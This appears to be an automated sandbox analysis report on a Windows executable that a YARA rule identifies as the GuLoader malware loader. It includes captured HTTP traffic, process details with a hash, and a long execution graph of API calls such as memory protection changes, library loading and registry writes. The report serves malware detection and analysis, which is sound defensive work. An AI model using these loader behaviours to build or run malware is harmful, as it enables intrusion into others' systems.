                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:38:44 GMT
                                                                          Content-Security-Policy: script-src 'nonce--iuWKS7bn5xuXfLW05SApA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:38:44 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 61 57 6f 37 32 54 33 77 32 4f 6e 4b 4b 45 30 57 77 70 6b 6d 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0aWo72T3w2OnKKE0WwpkmA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Statistics

                                                                          CPU Usage

                                                                          Click to jump to process

                                                                          Memory Usage

                                                                          Click to jump to process

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          General

                                                                          Target ID:0
                                                                          Start time:09:30:23
                                                                          Start date:10/01/2025
                                                                          Path:C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\nRNzqQOQwk.exe"
                                                                          Imagebase:0x400000
                                                                          File size:616'800 bytes
                                                                          MD5 hash:C616C105A117D63DE2B4F818C8FDD3E0
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.13419006132.00000000041CB000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:1
                                                                          Start time:09:31:58
                                                                          Start date:10/01/2025
                                                                          Path:C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\nRNzqQOQwk.exe"
                                                                          Imagebase:0x400000
                                                                          File size:616'800 bytes
                                                                          MD5 hash:C616C105A117D63DE2B4F818C8FDD3E0
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.16901286727.0000000002BAB000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          Disassembly

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:16.9%
                                                                            Dynamic/Decrypted Code Coverage:14.4%
                                                                            Signature Coverage:21.5%
                                                                            Total number of Nodes:1468
                                                                            Total number of Limit Nodes:37
                                                                            execution_graph 4624 10001000 4627 1000101b 4624->4627 4634 100014bb 4627->4634 4629 10001020 4630 10001024 4629->4630 4631 10001027 GlobalAlloc 4629->4631 4632 100014e2 3 API calls 4630->4632 4631->4630 4633 10001019 4632->4633 4636 100014c1 4634->4636 4635 100014c7 4635->4629 4636->4635 4637 100014d3 GlobalFree 4636->4637 4637->4629 4638 402241 4639 402ace 18 API calls 4638->4639 4640 402247 4639->4640 4641 402ace 18 API calls 4640->4641 4642 402250 4641->4642 4643 402ace 18 API calls 4642->4643 4644 402259 4643->4644 4645 4060a4 2 API calls 4644->4645 4646 402262 4645->4646 4647 402273 lstrlenA lstrlenA 4646->4647 4651 402266 4646->4651 4649 404fb9 25 API calls 4647->4649 4648 404fb9 25 API calls 4652 40226e 4648->4652 4650 4022af SHFileOperationA 4649->4650 4650->4651 4650->4652 4651->4648 4653 4043c3 4654 404400 4653->4654 4655 4043ef 4653->4655 4656 40440c GetDlgItem 4654->4656 4663 40446b 4654->4663 4714 40557a GetDlgItemTextA 4655->4714 4658 404420 4656->4658 4662 404434 SetWindowTextA 4658->4662 4666 4058ab 4 API calls 4658->4666 4659 40454f 4712 4046f9 4659->4712 4719 40557a GetDlgItemTextA 4659->4719 4660 4043fa 4661 40600b 5 API calls 4660->4661 4661->4654 4715 403f85 4662->4715 4663->4659 4668 405dc2 18 API calls 4663->4668 4663->4712 4671 40442a 4666->4671 4673 4044df SHBrowseForFolderA 4668->4673 4669 40457f 4674 405900 18 API calls 4669->4674 4671->4662 4678 405812 3 API calls 4671->4678 4672 404450 4675 403f85 19 API calls 4672->4675 4673->4659 4676 4044f7 CoTaskMemFree 4673->4676 4677 404585 4674->4677 4679 40445e 4675->4679 4680 405812 3 API calls 4676->4680 4720 405da0 lstrcpynA 4677->4720 4678->4662 4718 403fba SendMessageA 4679->4718 4682 404504 4680->4682 4685 40453b SetDlgItemTextA 4682->4685 4689 405dc2 18 API calls 4682->4689 4684 404464 4688 406139 5 API calls 4684->4688 4685->4659 4686 40459c 4687 406139 5 API calls 4686->4687 4695 4045a3 4687->4695 4688->4663 4690 404523 lstrcmpiA 4689->4690 4690->4685 4692 404534 lstrcatA 4690->4692 4691 4045df 4721 405da0 lstrcpynA 4691->4721 4692->4685 4694 4045e6 4696 4058ab 4 API calls 4694->4696 4695->4691 4700 405859 2 API calls 4695->4700 4701 404637 4695->4701 4697 4045ec GetDiskFreeSpaceA 4696->4697 4699 404610 MulDiv 4697->4699 4697->4701 4699->4701 4700->4695 4711 4046a8 4701->4711 4722 40483f 4701->4722 4703 40140b 2 API calls 4707 4046cb 4703->4707 4705 4046aa SetDlgItemTextA 4705->4711 4706 40469a 4725 40477a 4706->4725 4733 403fa7 EnableWindow 4707->4733 4710 4046e7 4710->4712 4734 404358 4710->4734 4711->4703 4711->4707 4737 403fec 4712->4737 4714->4660 4716 405dc2 18 API calls 4715->4716 4717 403f90 SetDlgItemTextA 4716->4717 4717->4672 4718->4684 4719->4669 4720->4686 4721->4694 4723 40477a 21 API calls 4722->4723 4724 404695 4723->4724 4724->4705 4724->4706 4726 404790 4725->4726 4727 405dc2 18 API calls 4726->4727 4728 4047f4 4727->4728 4729 405dc2 18 API calls 4728->4729 4730 4047ff 4729->4730 4731 405dc2 18 API calls 4730->4731 4732 404815 lstrlenA wsprintfA SetDlgItemTextA 4731->4732 4732->4711 4733->4710 4735 404366 4734->4735 4736 40436b SendMessageA 4734->4736 4735->4736 4736->4712 4738 40408d 4737->4738 4739 404004 GetWindowLongA 4737->4739 4739->4738 4740 404015 4739->4740 4741 404024 GetSysColor 4740->4741 4742 404027 4740->4742 4741->4742 4743 404037 SetBkMode 4742->4743 4744 40402d SetTextColor 4742->4744 4745 404055 4743->4745 4746 40404f GetSysColor 4743->4746 4744->4743 4747 404066 4745->4747 4748 40405c SetBkColor 4745->4748 4746->4745 4747->4738 4749 404080 CreateBrushIndirect 4747->4749 4750 404079 DeleteObject 4747->4750 4748->4747 4749->4738 4750->4749 4751 402844 4752 402aac 18 API calls 4751->4752 4753 40284a 4752->4753 4754 402872 4753->4754 4755 402889 4753->4755 4761 402729 4753->4761 4756 402886 4754->4756 4757 402877 4754->4757 4758 4028a3 4755->4758 4759 402893 4755->4759 4766 405cfe wsprintfA 4756->4766 4765 405da0 lstrcpynA 4757->4765 4760 405dc2 18 API calls 4758->4760 4762 402aac 18 API calls 4759->4762 4760->4761 4762->4761 4765->4761 4766->4761 4256 401746 4257 402ace 18 API calls 4256->4257 4258 40174d 4257->4258 4259 405a42 2 API calls 4258->4259 4260 401754 4259->4260 4261 405a42 2 API calls 4260->4261 4261->4260 4767 4026c7 4768 4026cd 4767->4768 4769 4026d5 FindClose 4768->4769 4770 40295e 4768->4770 4769->4770 4771 401947 4772 402ace 18 API calls 4771->4772 4773 40194e lstrlenA 4772->4773 4774 40258a 4773->4774 4775 402749 4776 402ace 18 API calls 4775->4776 4777 402757 4776->4777 4778 40276d 4777->4778 4779 402ace 18 API calls 4777->4779 4780 4059ee 2 API calls 4778->4780 4779->4778 4781 402773 4780->4781 4803 405a13 GetFileAttributesA CreateFileA 4781->4803 4783 402780 4784 402823 4783->4784 4785 40278c GlobalAlloc 4783->4785 4786 40282b DeleteFileA 4784->4786 4787 40283e 4784->4787 4788 4027a5 4785->4788 4789 40281a CloseHandle 4785->4789 4786->4787 4804 403138 SetFilePointer 4788->4804 4789->4784 4791 4027ab 4792 403122 ReadFile 4791->4792 4793 4027b4 GlobalAlloc 4792->4793 4794 4027c4 4793->4794 4795 4027f8 4793->4795 4796 402f33 32 API calls 4794->4796 4797 405aba WriteFile 4795->4797 4802 4027d1 4796->4802 4798 402804 GlobalFree 4797->4798 4799 402f33 32 API calls 4798->4799 4801 402817 4799->4801 4800 4027ef GlobalFree 4800->4795 4801->4789 4802->4800 4803->4783 4804->4791 4266 1000270b 4267 1000275b 4266->4267 4268 1000271b VirtualProtect 4266->4268 4268->4267 4808 1000180d 4809 10001830 4808->4809 4810 10001860 GlobalFree 4809->4810 4811 10001872 4809->4811 4810->4811 4812 10001266 2 API calls 4811->4812 4813 100019e3 GlobalFree GlobalFree 4812->4813 4814 4020cd 4815 402ace 18 API calls 4814->4815 4816 4020d4 4815->4816 4817 402ace 18 API calls 4816->4817 4818 4020de 4817->4818 4819 402ace 18 API calls 4818->4819 4820 4020e8 4819->4820 4821 402ace 18 API calls 4820->4821 4822 4020f2 4821->4822 4823 402ace 18 API calls 4822->4823 4824 4020fc 4823->4824 4825 40213b CoCreateInstance 4824->4825 4826 402ace 18 API calls 4824->4826 4829 40215a 4825->4829 4831 402202 4825->4831 4826->4825 4827 401423 25 API calls 4828 402238 4827->4828 4830 4021e2 MultiByteToWideChar 4829->4830 4829->4831 4830->4831 4831->4827 4831->4828 4832 4040ce 4834 4040e4 4832->4834 4837 4041f0 4832->4837 4833 40425f 4835 404333 4833->4835 4836 404269 GetDlgItem 4833->4836 4838 403f85 19 API calls 4834->4838 4842 403fec 8 API calls 4835->4842 4839 4042f1 4836->4839 4840 40427f 4836->4840 4837->4833 4837->4835 4844 404234 GetDlgItem SendMessageA 4837->4844 4841 40413a 4838->4841 4839->4835 4848 404303 4839->4848 4840->4839 4847 4042a5 6 API calls 4840->4847 4843 403f85 19 API calls 4841->4843 4845 40432e 4842->4845 4846 404147 CheckDlgButton 4843->4846 4863 403fa7 EnableWindow 4844->4863 4861 403fa7 EnableWindow 4846->4861 4847->4839 4851 404309 SendMessageA 4848->4851 4852 40431a 4848->4852 4851->4852 4852->4845 4855 404320 SendMessageA 4852->4855 4853 40425a 4856 404358 SendMessageA 4853->4856 4854 404165 GetDlgItem 4862 403fba SendMessageA 4854->4862 4855->4845 4856->4833 4858 40417b SendMessageA 4859 4041a2 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4858->4859 4860 404199 GetSysColor 4858->4860 4859->4845 4860->4859 4861->4854 4862->4858 4863->4853 4864 4028d2 4865 402aac 18 API calls 4864->4865 4866 4028d8 4865->4866 4867 40290d 4866->4867 4869 402729 4866->4869 4870 4028ea 4866->4870 4868 405dc2 18 API calls 4867->4868 4867->4869 4868->4869 4870->4869 4872 405cfe wsprintfA 4870->4872 4872->4869 4285 4023d3 4286 4023d9 4285->4286 4287 402ace 18 API calls 4286->4287 4288 4023eb 4287->4288 4289 402ace 18 API calls 4288->4289 4290 4023f5 RegCreateKeyExA 4289->4290 4291 402729 4290->4291 4292 40241f 4290->4292 4293 402437 4292->4293 4295 402ace 18 API calls 4292->4295 4294 402443 4293->4294 4302 402aac 4293->4302 4298 402462 RegSetValueExA 4294->4298 4299 402f33 32 API calls 4294->4299 4296 402430 lstrlenA 4295->4296 4296->4293 4300 402478 RegCloseKey 4298->4300 4299->4298 4300->4291 4303 405dc2 18 API calls 4302->4303 4304 402ac1 4303->4304 4304->4294 4873 401cd4 4874 402aac 18 API calls 4873->4874 4875 401cda IsWindow 4874->4875 4876 401a0e 4875->4876 4322 4014d6 4323 402aac 18 API calls 4322->4323 4324 4014dc Sleep 4323->4324 4326 40295e 4324->4326 4334 4025d7 4335 402aac 18 API calls 4334->4335 4340 4025e1 4335->4340 4336 40264f 4337 405a8b ReadFile 4337->4340 4338 402651 4343 405cfe wsprintfA 4338->4343 4339 402661 4339->4336 4342 402677 SetFilePointer 4339->4342 4340->4336 4340->4337 4340->4338 4340->4339 4342->4336 4343->4336 4367 401759 4368 402ace 18 API calls 4367->4368 4369 401760 4368->4369 4370 401786 4369->4370 4371 40177e 4369->4371 4408 405da0 lstrcpynA 4370->4408 4407 405da0 lstrcpynA 4371->4407 4374 401791 4376 405812 3 API calls 4374->4376 4375 401784 4378 40600b 5 API calls 4375->4378 4377 401797 lstrcatA 4376->4377 4377->4375 4403 4017a3 4378->4403 4379 4060a4 2 API calls 4379->4403 4380 4017e4 4381 4059ee 2 API calls 4380->4381 4381->4403 4383 4017ba CompareFileTime 4383->4403 4384 40187e 4386 404fb9 25 API calls 4384->4386 4385 401855 4387 404fb9 25 API calls 4385->4387 4404 40186a 4385->4404 4389 401888 4386->4389 4387->4404 4388 405da0 lstrcpynA 4388->4403 4390 402f33 32 API calls 4389->4390 4391 40189b 4390->4391 4392 4018af SetFileTime 4391->4392 4394 4018c1 CloseHandle 4391->4394 4392->4394 4393 405dc2 18 API calls 4393->4403 4395 4018d2 4394->4395 4394->4404 4396 4018d7 4395->4396 4397 4018ea 4395->4397 4398 405dc2 18 API calls 4396->4398 4399 405dc2 18 API calls 4397->4399 4400 4018df lstrcatA 4398->4400 4401 4018f2 4399->4401 4400->4401 4401->4404 4405 405596 MessageBoxIndirectA 4401->4405 4402 405596 MessageBoxIndirectA 4402->4403 4403->4379 4403->4380 4403->4383 4403->4384 4403->4385 4403->4388 4403->4393 4403->4402 4406 405a13 GetFileAttributesA CreateFileA 4403->4406 4405->4404 4406->4403 4407->4375 4408->4374 4877 401659 4878 402ace 18 API calls 4877->4878 4879 40165f 4878->4879 4880 4060a4 2 API calls 4879->4880 4881 401665 4880->4881 4882 401e59 4883 402ace 18 API calls 4882->4883 4884 401e5f 4883->4884 4885 402ace 18 API calls 4884->4885 4886 401e68 4885->4886 4887 402ace 18 API calls 4886->4887 4888 401e71 4887->4888 4889 402ace 18 API calls 4888->4889 4890 401e7a 4889->4890 4891 401423 25 API calls 4890->4891 4892 401e81 ShellExecuteA 4891->4892 4893 401eae 4892->4893 4894 401959 4895 402aac 18 API calls 4894->4895 4896 401960 4895->4896 4897 402aac 18 API calls 4896->4897 4898 40196d 4897->4898 4899 402ace 18 API calls 4898->4899 4900 401984 lstrlenA 4899->4900 4901 401994 4900->4901 4902 4019d4 4901->4902 4906 405da0 lstrcpynA 4901->4906 4904 4019c4 4904->4902 4905 4019c9 lstrlenA 4904->4905 4905->4902 4906->4904 4907 1000161a 4908 10001649 4907->4908 4909 10001a5d 18 API calls 4908->4909 4910 10001650 4909->4910 4911 10001663 4910->4911 4912 10001657 4910->4912 4913 1000168a 4911->4913 4914 1000166d 4911->4914 4915 10001266 2 API calls 4912->4915 4917 10001690 4913->4917 4918 100016b4 4913->4918 4916 100014e2 3 API calls 4914->4916 4919 10001661 4915->4919 4920 10001672 4916->4920 4921 10001559 3 API calls 4917->4921 4922 100014e2 3 API calls 4918->4922 4923 10001559 3 API calls 4920->4923 4924 10001695 4921->4924 4922->4919 4925 10001678 4923->4925 4926 10001266 2 API calls 4924->4926 4927 10001266 2 API calls 4925->4927 4928 1000169b GlobalFree 4926->4928 4929 1000167e GlobalFree 4927->4929 4928->4919 4930 100016af GlobalFree 4928->4930 4929->4919 4930->4919 4931 401f5d 4932 402ace 18 API calls 4931->4932 4933 401f64 4932->4933 4934 406139 5 API calls 4933->4934 4935 401f73 4934->4935 4936 401f8b GlobalAlloc 4935->4936 4937 401ff3 4935->4937 4936->4937 4938 401f9f 4936->4938 4939 406139 5 API calls 4938->4939 4940 401fa6 4939->4940 4941 406139 5 API calls 4940->4941 4942 401fb0 4941->4942 4942->4937 4946 405cfe wsprintfA 4942->4946 4944 401fe7 4947 405cfe wsprintfA 4944->4947 4946->4944 4947->4937 4948 401a5e 4949 402aac 18 API calls 4948->4949 4950 401a64 4949->4950 4951 402aac 18 API calls 4950->4951 4952 401a0e 4951->4952 4953 4036de 4954 4036e9 4953->4954 4955 4036f0 GlobalAlloc 4954->4955 4956 4036ed 4954->4956 4955->4956 4957 4026e1 4958 4026e7 4957->4958 4959 4026eb FindNextFileA 4958->4959 4961 4026fd 4958->4961 4960 40273c 4959->4960 4959->4961 4963 405da0 lstrcpynA 4960->4963 4963->4961 4964 40166a 4965 402ace 18 API calls 4964->4965 4966 401671 4965->4966 4967 402ace 18 API calls 4966->4967 4968 40167a 4967->4968 4969 402ace 18 API calls 4968->4969 4970 401683 MoveFileA 4969->4970 4971 401696 4970->4971 4972 40168f 4970->4972 4974 4060a4 2 API calls 4971->4974 4976 402238 4971->4976 4973 401423 25 API calls 4972->4973 4973->4976 4975 4016a5 4974->4975 4975->4976 4977 405c5b 38 API calls 4975->4977 4977->4972 4978 4019ed 4979 402ace 18 API calls 4978->4979 4980 4019f4 4979->4980 4981 402ace 18 API calls 4980->4981 4982 4019fd 4981->4982 4983 401a04 lstrcmpiA 4982->4983 4984 401a16 lstrcmpA 4982->4984 4985 401a0a 4983->4985 4984->4985 4986 40256e 4987 402ace 18 API calls 4986->4987 4988 402575 4987->4988 4991 405a13 GetFileAttributesA CreateFileA 4988->4991 4990 402581 4991->4990 4269 4022f2 4270 4022fa 4269->4270 4275 402300 4269->4275 4271 402ace 18 API calls 4270->4271 4271->4275 4272 402ace 18 API calls 4274 402310 4272->4274 4273 40231e 4277 402ace 18 API calls 4273->4277 4274->4273 4276 402ace 18 API calls 4274->4276 4275->4272 4275->4274 4276->4273 4278 402327 WritePrivateProfileStringA 4277->4278 4992 100015b3 4993 100014bb GlobalFree 4992->4993 4995 100015cb 4993->4995 4994 10001611 GlobalFree 4995->4994 4996 100015e6 4995->4996 4997 100015fd VirtualFree 4995->4997 4996->4994 4997->4994 4998 4014f4 SetForegroundWindow 4999 40295e 4998->4999 5000 401cf5 5001 402aac 18 API calls 5000->5001 5002 401cfc 5001->5002 5003 402aac 18 API calls 5002->5003 5004 401d08 GetDlgItem 5003->5004 5005 40258a 5004->5005 5006 4024f5 5007 402bd8 19 API calls 5006->5007 5008 4024ff 5007->5008 5009 402aac 18 API calls 5008->5009 5010 402508 5009->5010 5011 402523 RegEnumKeyA 5010->5011 5012 40252f RegEnumValueA 5010->5012 5013 402729 5010->5013 5014 402548 RegCloseKey 5011->5014 5012->5013 5012->5014 5014->5013 4344 402377 4345 4023a7 4344->4345 4346 40237c 4344->4346 4347 402ace 18 API calls 4345->4347 4348 402bd8 19 API calls 4346->4348 4351 4023ae 4347->4351 4349 402383 4348->4349 4350 40238d 4349->4350 4353 4023c4 4349->4353 4352 402ace 18 API calls 4350->4352 4356 402b0e RegOpenKeyExA 4351->4356 4354 402394 RegDeleteValueA RegCloseKey 4352->4354 4354->4353 4357 402ba2 4356->4357 4361 402b39 4356->4361 4357->4353 4358 402b5f RegEnumKeyA 4359 402b71 RegCloseKey 4358->4359 4358->4361 4362 406139 5 API calls 4359->4362 4360 402b96 RegCloseKey 4365 402b85 4360->4365 4361->4358 4361->4359 4361->4360 4363 402b0e 5 API calls 4361->4363 4364 402b81 4362->4364 4363->4361 4364->4365 4366 402bb1 RegDeleteKeyA 4364->4366 4365->4357 4366->4365 5016 4050f7 5017 4052a2 5016->5017 5018 405119 GetDlgItem GetDlgItem GetDlgItem 5016->5018 5019 4052d2 5017->5019 5020 4052aa GetDlgItem CreateThread CloseHandle 5017->5020 5061 403fba SendMessageA 5018->5061 5023 405300 5019->5023 5024 405321 5019->5024 5025 4052e8 ShowWindow ShowWindow 5019->5025 5020->5019 5022 405189 5026 405190 GetClientRect GetSystemMetrics SendMessageA SendMessageA 5022->5026 5027 40535b 5023->5027 5029 405310 5023->5029 5030 405334 ShowWindow 5023->5030 5031 403fec 8 API calls 5024->5031 5063 403fba SendMessageA 5025->5063 5032 4051e2 SendMessageA SendMessageA 5026->5032 5033 4051fe 5026->5033 5027->5024 5034 405368 SendMessageA 5027->5034 5064 403f5e 5029->5064 5037 405354 5030->5037 5038 405346 5030->5038 5036 40532d 5031->5036 5032->5033 5040 405211 5033->5040 5041 405203 SendMessageA 5033->5041 5034->5036 5042 405381 CreatePopupMenu 5034->5042 5039 403f5e SendMessageA 5037->5039 5043 404fb9 25 API calls 5038->5043 5039->5027 5045 403f85 19 API calls 5040->5045 5041->5040 5044 405dc2 18 API calls 5042->5044 5043->5037 5046 405391 AppendMenuA 5044->5046 5047 405221 5045->5047 5048 4053c2 TrackPopupMenu 5046->5048 5049 4053af GetWindowRect 5046->5049 5050 40522a ShowWindow 5047->5050 5051 40525e GetDlgItem SendMessageA 5047->5051 5048->5036 5052 4053de 5048->5052 5049->5048 5053 405240 ShowWindow 5050->5053 5056 40524d 5050->5056 5051->5036 5054 405285 SendMessageA SendMessageA 5051->5054 5055 4053fd SendMessageA 5052->5055 5053->5056 5054->5036 5055->5055 5057 40541a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5055->5057 5062 403fba SendMessageA 5056->5062 5059 40543c SendMessageA 5057->5059 5059->5059 5060 40545e GlobalUnlock SetClipboardData CloseClipboard 5059->5060 5060->5036 5061->5022 5062->5051 5063->5023 5065 403f65 5064->5065 5066 403f6b SendMessageA 5064->5066 5065->5066 5066->5024 5067 40437c 5068 4043b2 5067->5068 5069 40438c 5067->5069 5071 403fec 8 API calls 5068->5071 5070 403f85 19 API calls 5069->5070 5072 404399 SetDlgItemTextA 5070->5072 5073 4043be 5071->5073 5072->5068 5074 1000103d 5075 1000101b 5 API calls 5074->5075 5076 10001056 5075->5076 5077 4018fd 5078 401934 5077->5078 5079 402ace 18 API calls 5078->5079 5080 401939 5079->5080 5081 405642 69 API calls 5080->5081 5082 401942 5081->5082 4442 401fff 4443 402011 4442->4443 4453 4020bf 4442->4453 4444 402ace 18 API calls 4443->4444 4446 402018 4444->4446 4445 401423 25 API calls 4451 402238 4445->4451 4447 402ace 18 API calls 4446->4447 4448 402021 4447->4448 4449 402036 LoadLibraryExA 4448->4449 4450 402029 GetModuleHandleA 4448->4450 4452 402046 GetProcAddress 4449->4452 4449->4453 4450->4449 4450->4452 4454 402092 4452->4454 4455 402055 4452->4455 4453->4445 4456 404fb9 25 API calls 4454->4456 4457 402074 4455->4457 4458 40205d 4455->4458 4459 402065 4456->4459 4463 100016bd 4457->4463 4460 401423 25 API calls 4458->4460 4459->4451 4461 4020b3 FreeLibrary 4459->4461 4460->4459 4461->4451 4464 100016ed 4463->4464 4505 10001a5d 4464->4505 4466 1000180a 4466->4459 4467 100016f4 4467->4466 4468 10001705 4467->4468 4469 1000170c 4467->4469 4554 100021b0 4468->4554 4537 100021fa 4469->4537 4474 10001770 4480 100017b2 4474->4480 4481 10001776 4474->4481 4475 10001752 4567 100023da 4475->4567 4476 10001722 4479 10001728 4476->4479 4483 10001733 4476->4483 4477 1000173b 4489 10001731 4477->4489 4564 10002aa3 4477->4564 4479->4489 4548 100027e8 4479->4548 4487 100023da 11 API calls 4480->4487 4485 10001559 3 API calls 4481->4485 4482 10001758 4578 10001559 4482->4578 4558 10002589 4483->4558 4491 1000178c 4485->4491 4492 100017a4 4487->4492 4489->4474 4489->4475 4495 100023da 11 API calls 4491->4495 4496 100017f9 4492->4496 4589 100023a0 4492->4589 4494 10001739 4494->4489 4495->4492 4496->4466 4500 10001803 GlobalFree 4496->4500 4500->4466 4502 100017e5 4502->4496 4593 100014e2 wsprintfA 4502->4593 4503 100017de FreeLibrary 4503->4502 4596 10001215 GlobalAlloc 4505->4596 4507 10001a81 4597 10001215 GlobalAlloc 4507->4597 4509 10001cbb GlobalFree GlobalFree GlobalFree 4510 10001cd8 4509->4510 4525 10001d22 4509->4525 4511 1000201a 4510->4511 4518 10001ced 4510->4518 4510->4525 4513 1000203c GetModuleHandleA 4511->4513 4511->4525 4512 10001b60 GlobalAlloc 4532 10001a8c 4512->4532 4516 10002062 4513->4516 4517 1000204d LoadLibraryA 4513->4517 4514 10001bab lstrcpyA 4519 10001bb5 lstrcpyA 4514->4519 4515 10001bc9 GlobalFree 4515->4532 4604 100015a4 GetProcAddress 4516->4604 4517->4516 4517->4525 4518->4525 4600 10001224 4518->4600 4519->4532 4521 100020b3 4522 100020c0 lstrlenA 4521->4522 4521->4525 4605 100015a4 GetProcAddress 4522->4605 4524 10001f7a 4524->4525 4529 10001fbe lstrcpyA 4524->4529 4525->4467 4526 10002074 4526->4521 4536 1000209d GetProcAddress 4526->4536 4529->4525 4530 10001e75 GlobalFree 4530->4532 4531 100020d9 4531->4525 4532->4509 4532->4512 4532->4514 4532->4515 4532->4519 4532->4524 4532->4525 4532->4530 4533 10001c07 4532->4533 4534 10001224 2 API calls 4532->4534 4603 10001215 GlobalAlloc 4532->4603 4533->4532 4598 10001534 GlobalSize GlobalAlloc 4533->4598 4534->4532 4536->4521 4543 10002212 4537->4543 4539 10002349 GlobalFree 4540 10001712 4539->4540 4539->4543 4540->4476 4540->4477 4540->4489 4541 100022b9 GlobalAlloc MultiByteToWideChar 4545 10002303 4541->4545 4546 100022e3 GlobalAlloc CLSIDFromString GlobalFree 4541->4546 4542 1000230a lstrlenA 4542->4539 4542->4545 4543->4539 4543->4541 4543->4542 4544 10001224 GlobalAlloc lstrcpynA 4543->4544 4607 100012ad 4543->4607 4544->4543 4545->4539 4611 1000251d 4545->4611 4546->4539 4550 100027fa 4548->4550 4549 1000289f VirtualAllocEx 4551 100028bd 4549->4551 4550->4549 4552 100029b9 4551->4552 4553 100029ae GetLastError 4551->4553 4552->4489 4553->4552 4555 100021c0 4554->4555 4556 1000170b 4554->4556 4555->4556 4557 100021d2 GlobalAlloc 4555->4557 4556->4469 4557->4555 4562 100025a5 4558->4562 4559 100025f6 GlobalAlloc 4563 10002618 4559->4563 4560 10002609 4561 1000260e GlobalSize 4560->4561 4560->4563 4561->4563 4562->4559 4562->4560 4563->4494 4565 10002aae 4564->4565 4566 10002aee GlobalFree 4565->4566 4614 10001215 GlobalAlloc 4567->4614 4569 1000243a lstrcpynA 4575 100023e6 4569->4575 4570 1000244b StringFromGUID2 WideCharToMultiByte 4570->4575 4571 1000246f WideCharToMultiByte 4571->4575 4572 10002490 wsprintfA 4572->4575 4573 100024b4 GlobalFree 4573->4575 4574 100024ee GlobalFree 4574->4482 4575->4569 4575->4570 4575->4571 4575->4572 4575->4573 4575->4574 4576 10001266 2 API calls 4575->4576 4615 100012d1 4575->4615 4576->4575 4619 10001215 GlobalAlloc 4578->4619 4580 1000155f 4582 10001586 4580->4582 4583 1000156c lstrcpyA 4580->4583 4584 100015a0 4582->4584 4585 1000158b wsprintfA 4582->4585 4583->4584 4586 10001266 4584->4586 4585->4584 4587 100012a8 GlobalFree 4586->4587 4588 1000126f GlobalAlloc lstrcpynA 4586->4588 4587->4492 4588->4587 4590 100017c5 4589->4590 4591 100023ae 4589->4591 4590->4502 4590->4503 4591->4590 4592 100023c7 GlobalFree 4591->4592 4592->4591 4594 10001266 2 API calls 4593->4594 4595 10001503 4594->4595 4595->4496 4596->4507 4597->4532 4599 10001552 